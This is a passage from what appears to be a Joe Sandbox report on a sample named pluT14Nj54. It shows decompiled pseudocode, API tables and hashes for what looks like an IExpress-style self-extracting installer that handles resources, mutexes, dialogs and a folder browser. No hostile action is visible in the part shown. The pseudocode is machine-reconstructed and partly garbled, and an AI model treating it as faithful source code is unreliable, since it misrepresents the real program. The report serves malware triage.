                                                                                                                                                                                                    				struct HRSRC__* _t31;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t13 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                    				_t65 = 0;
                                                                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                                                                    				_t48 = __edx;
                                                                                                                                                                                                    				 *0x399a3c = __ecx;
                                                                                                                                                                                                    				memset(0x399140, 0, 0x8fc);
                                                                                                                                                                                                    				memset(0x398a20, 0, 0x32c);
                                                                                                                                                                                                    				memset(0x3988c0, 0, 0x104);
                                                                                                                                                                                                    				 *0x3993ec = 1;
                                                                                                                                                                                                    				_t20 = E0039468F("TITLE", 0x399154, 0x7f);
                                                                                                                                                                                                    				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                    					_t64 = 0x4b1;
                                                                                                                                                                                                    					goto L32;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                    					 *0x39858c = _t27;
                                                                                                                                                                                                    					SetEvent(_t27);
                                                                                                                                                                                                    					_t64 = 0x399a34;
                                                                                                                                                                                                    					if(E0039468F("EXTRACTOPT", 0x399a34, 4) != 0) {
                                                                                                                                                                                                    						if(( *0x399a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                    							 *0x399120 =  *0x399120 & _t65;
                                                                                                                                                                                                    							if(E00395C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                    								if( *0x398a3a == 0) {
                                                                                                                                                                                                    									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                    									if(_t31 != 0) {
                                                                                                                                                                                                    										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x398184 != 0) {
                                                                                                                                                                                                    										__imp__#17();
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x398a24 == 0) {
                                                                                                                                                                                                    										_t57 = _t65;
                                                                                                                                                                                                    										if(E003936EE(_t65) == 0) {
                                                                                                                                                                                                    											goto L33;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t33 =  *0x399a40; // 0x3
                                                                                                                                                                                                    											_t48 = 1;
                                                                                                                                                                                                    											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                    												if(( *0x399a34 & 0x00000100) == 0 || ( *0x398a38 & 0x00000001) != 0 || E003918A3(_t64, _t66) != 0) {
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t64 = 0x7d6;
                                                                                                                                                                                                    													if(E00396517(_t57, 0x7d6, _t34, E003919E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                    														goto L33;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												L30:
                                                                                                                                                                                                    												_t23 = _t48;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t23 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00392390(0x398a3a);
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t64 = 0x520;
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								E003944B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 =  &_v268;
                                                                                                                                                                                                    							if(E0039468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                    								 *0x398588 = _t43;
                                                                                                                                                                                                    								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(( *0x399a34 & 0x00000080) == 0) {
                                                                                                                                                                                                    										_t64 = 0x524;
                                                                                                                                                                                                    										if(E003944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                    											goto L12;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                    										E003944B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                    										CloseHandle( *0x398588);
                                                                                                                                                                                                    										 *0x399124 = 0x800700b7;
                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                    						E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						 *0x399124 = 0x80070714;
                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00392cb5
                                                                                                                                                                                                    0x00392cbc
                                                                                                                                                                                                    0x00392cc7
                                                                                                                                                                                                    0x00392cc9
                                                                                                                                                                                                    0x00392cd1
                                                                                                                                                                                                    0x00392cd3
                                                                                                                                                                                                    0x00392cd9
                                                                                                                                                                                                    0x00392ce9
                                                                                                                                                                                                    0x00392cf9
                                                                                                                                                                                                    0x00392d0e
                                                                                                                                                                                                    0x00392d15
                                                                                                                                                                                                    0x00392d1c
                                                                                                                                                                                                    0x00392ef3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392d2d
                                                                                                                                                                                                    0x00392d34
                                                                                                                                                                                                    0x00392d3b
                                                                                                                                                                                                    0x00392d40
                                                                                                                                                                                                    0x00392d48
                                                                                                                                                                                                    0x00392d59
                                                                                                                                                                                                    0x00392d84
                                                                                                                                                                                                    0x00392e1f
                                                                                                                                                                                                    0x00392e1f
                                                                                                                                                                                                    0x00392e2e
                                                                                                                                                                                                    0x00392e41
                                                                                                                                                                                                    0x00392e5a
                                                                                                                                                                                                    0x00392e62
                                                                                                                                                                                                    0x00392e6c
                                                                                                                                                                                                    0x00392e6c
                                                                                                                                                                                                    0x00392e75
                                                                                                                                                                                                    0x00392e77
                                                                                                                                                                                                    0x00392e77
                                                                                                                                                                                                    0x00392e84
                                                                                                                                                                                                    0x00392e8b
                                                                                                                                                                                                    0x00392e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392e96
                                                                                                                                                                                                    0x00392e96
                                                                                                                                                                                                    0x00392e9e
                                                                                                                                                                                                    0x00392ea2
                                                                                                                                                                                                    0x00392eba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392ece
                                                                                                                                                                                                    0x00392ede
                                                                                                                                                                                                    0x00392eed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392eed
                                                                                                                                                                                                    0x00392eef
                                                                                                                                                                                                    0x00392eef
                                                                                                                                                                                                    0x00392eef
                                                                                                                                                                                                    0x00392eef
                                                                                                                                                                                                    0x00392ea2
                                                                                                                                                                                                    0x00392e86
                                                                                                                                                                                                    0x00392e88
                                                                                                                                                                                                    0x00392e88
                                                                                                                                                                                                    0x00392e43
                                                                                                                                                                                                    0x00392e48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392e48
                                                                                                                                                                                                    0x00392e30
                                                                                                                                                                                                    0x00392e30
                                                                                                                                                                                                    0x00392ef8
                                                                                                                                                                                                    0x00392f01
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392f01
                                                                                                                                                                                                    0x00392d8a
                                                                                                                                                                                                    0x00392d8f
                                                                                                                                                                                                    0x00392da1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392da3
                                                                                                                                                                                                    0x00392dae
                                                                                                                                                                                                    0x00392db4
                                                                                                                                                                                                    0x00392dbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392dca
                                                                                                                                                                                                    0x00392dd3
                                                                                                                                                                                                    0x00392df5
                                                                                                                                                                                                    0x00392e02
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392dd5
                                                                                                                                                                                                    0x00392dde
                                                                                                                                                                                                    0x00392de3
                                                                                                                                                                                                    0x00392e04
                                                                                                                                                                                                    0x00392e0a
                                                                                                                                                                                                    0x00392e10
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392e10
                                                                                                                                                                                                    0x00392dd3
                                                                                                                                                                                                    0x00392dbb
                                                                                                                                                                                                    0x00392da1
                                                                                                                                                                                                    0x00392d5b
                                                                                                                                                                                                    0x00392d5b
                                                                                                                                                                                                    0x00392d5d
                                                                                                                                                                                                    0x00392d69
                                                                                                                                                                                                    0x00392d6e
                                                                                                                                                                                                    0x00392f06
                                                                                                                                                                                                    0x00392f06
                                                                                                                                                                                                    0x00392f06
                                                                                                                                                                                                    0x00392d59
                                                                                                                                                                                                    0x00392f18

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00392CD9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00392CE9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00392CF9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00392D34
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00392D40
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00392DAE
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00392DBD
                                                                                                                                                                                                    • CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00392E0A
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
                                                                                                                                                                                                    • API String ID: 1002816675-1021407552
                                                                                                                                                                                                    • Opcode ID: a6456179bc8952338352f38fbbee79c960b6ae17a8d8c817bbc6eed0141cd3fe
                                                                                                                                                                                                    • Instruction ID: ed91c9c976bbb5cd1facf0d8c3eb8cd4cdebe3af2b62ec9312881cc00dc1547e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6456179bc8952338352f38fbbee79c960b6ae17a8d8c817bbc6eed0141cd3fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA51E870740B017BEF276B399C8AB7B369CEB86700F01442BF942D96E5DBB58C41C665
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                    			E003934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				struct HWND__* _t35;
                                                                                                                                                                                                    				struct HWND__* _t38;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t9 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					 *0x3991d8 = 1;
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                    					EndDialog();
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				_pop(1);
                                                                                                                                                                                                    				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                    				if(_t12 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                    					if(_a12 != 0x1b) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t13 = _t12 - 0xe;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t35 = _a4;
                                                                                                                                                                                                    					 *0x398584 = _t35;
                                                                                                                                                                                                    					E003943D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                    					__eflags =  *0x398184; // 0x1
                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetWindowTextA(_t35, "nst0dum");
                                                                                                                                                                                                    					_t17 = CreateThread(0, 0, E00394FE0, 0, 0, 0x398798);
                                                                                                                                                                                                    					 *0x39879c = _t17;
                                                                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						E003944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t35);
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t23 = _t13 - 1;
                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 2;
                                                                                                                                                                                                    					if(_a12 != 2) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					ResetEvent( *0x39858c);
                                                                                                                                                                                                    					_t38 =  *0x398584; // 0x0
                                                                                                                                                                                                    					_t25 = E003944B9(_t38, 0x4b2, 0x391140, 0, 0x20, 4);
                                                                                                                                                                                                    					__eflags = _t25 - 6;
                                                                                                                                                                                                    					if(_t25 == 6) {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						 *0x3991d8 = 1;
                                                                                                                                                                                                    						SetEvent( *0x39858c);
                                                                                                                                                                                                    						_t39 =  *0x39879c; // 0x0
                                                                                                                                                                                                    						E00393680(_t39);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t25 - 1;
                                                                                                                                                                                                    					if(_t25 == 1) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetEvent( *0x39858c);
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                    					TerminateThread( *0x39879c, 0);
                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x003934fb
                                                                                                                                                                                                    0x003934fe
                                                                                                                                                                                                    0x00393665
                                                                                                                                                                                                    0x00393666
                                                                                                                                                                                                    0x00393666
                                                                                                                                                                                                    0x00393668
                                                                                                                                                                                                    0x0039366e
                                                                                                                                                                                                    0x0039366e
                                                                                                                                                                                                    0x00393671
                                                                                                                                                                                                    0x00393671
                                                                                                                                                                                                    0x00393677
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393677
                                                                                                                                                                                                    0x00393504
                                                                                                                                                                                                    0x00393506
                                                                                                                                                                                                    0x00393507
                                                                                                                                                                                                    0x0039350c
                                                                                                                                                                                                    0x0039365b
                                                                                                                                                                                                    0x0039365f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393661
                                                                                                                                                                                                    0x00393512
                                                                                                                                                                                                    0x00393515
                                                                                                                                                                                                    0x003935be
                                                                                                                                                                                                    0x003935c1
                                                                                                                                                                                                    0x003935d1
                                                                                                                                                                                                    0x003935d8
                                                                                                                                                                                                    0x003935de
                                                                                                                                                                                                    0x003935f8
                                                                                                                                                                                                    0x00393617
                                                                                                                                                                                                    0x00393617
                                                                                                                                                                                                    0x00393623
                                                                                                                                                                                                    0x00393637
                                                                                                                                                                                                    0x0039363d
                                                                                                                                                                                                    0x00393642
                                                                                                                                                                                                    0x00393644
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393646
                                                                                                                                                                                                    0x00393652
                                                                                                                                                                                                    0x00393657
                                                                                                                                                                                                    0x00393658
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393658
                                                                                                                                                                                                    0x00393644
                                                                                                                                                                                                    0x0039351b
                                                                                                                                                                                                    0x0039351d
                                                                                                                                                                                                    0x0039354f
                                                                                                                                                                                                    0x00393553
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039355f
                                                                                                                                                                                                    0x00393565
                                                                                                                                                                                                    0x0039357c
                                                                                                                                                                                                    0x00393581
                                                                                                                                                                                                    0x00393584
                                                                                                                                                                                                    0x0039359b
                                                                                                                                                                                                    0x003935a1
                                                                                                                                                                                                    0x003935a7
                                                                                                                                                                                                    0x003935ad
                                                                                                                                                                                                    0x003935b3
                                                                                                                                                                                                    0x003935b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003935b8
                                                                                                                                                                                                    0x00393586
                                                                                                                                                                                                    0x00393588
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393590
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393590
                                                                                                                                                                                                    0x00393524
                                                                                                                                                                                                    0x00393535
                                                                                                                                                                                                    0x00393541
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393549
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00393535
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00393541
                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0039355F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00391140,00000000,00000020,00000004), ref: 00393590
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 003935C7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 003935F1
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 003935F8
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00393610
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00393617
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00393623
                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00393637
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00393671
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 2406144884-432003757
                                                                                                                                                                                                    • Opcode ID: 4238add8d151f58768d9ca084cb7edfe92f87a669e27f29d5bcbaac41ccee22b
                                                                                                                                                                                                    • Instruction ID: 57cfbe3f1d9c0f5472eca5aa770b07abc3c39f682aac781a43f0a54c16edc3a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4238add8d151f58768d9ca084cb7edfe92f87a669e27f29d5bcbaac41ccee22b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2631C9B1240301BBDF231F29EC4DE2B3A6DE7C6B01F11491BF642952B0CA738901DB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                    			E00394224(char __ecx) {
                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				char* _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                    				char _t76;
                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					E003944B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t76 =  *0x3988c0; // 0x0
                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					 *0x3987a0 = 0;
                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                    					_v40 = 0x398598;
                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                    					_v32 = E00394200;
                                                                                                                                                                                                    					_v28 = 0x3988c0;
                                                                                                                                                                                                    					 *0x39a288( &_v52);
                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						 *0x39a288(_t32, 0x3988c0);
                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *0x3988c0 != 0) {
                                                                                                                                                                                                    							E00391680(0x3987a0, 0x104, 0x3988c0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x39a288(_v12);
                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t85 =  *0x3987a0; // 0x0
                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					GetTempPathA(0x104, 0x3988c0);
                                                                                                                                                                                                    					_t61 = 0x3988c0;
                                                                                                                                                                                                    					_t4 =  &(_t61[1]); // 0x3988c1
                                                                                                                                                                                                    					_t65 = _t4;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t42 =  *_t61;
                                                                                                                                                                                                    						_t61 =  &(_t61[1]);
                                                                                                                                                                                                    					} while (_t42 != 0);
                                                                                                                                                                                                    					_t5 = _t61 - _t65 + 0x3988c0; // 0x731181
                                                                                                                                                                                                    					_t44 = CharPrevA(0x3988c0, _t5);
                                                                                                                                                                                                    					_v8 = _t44;
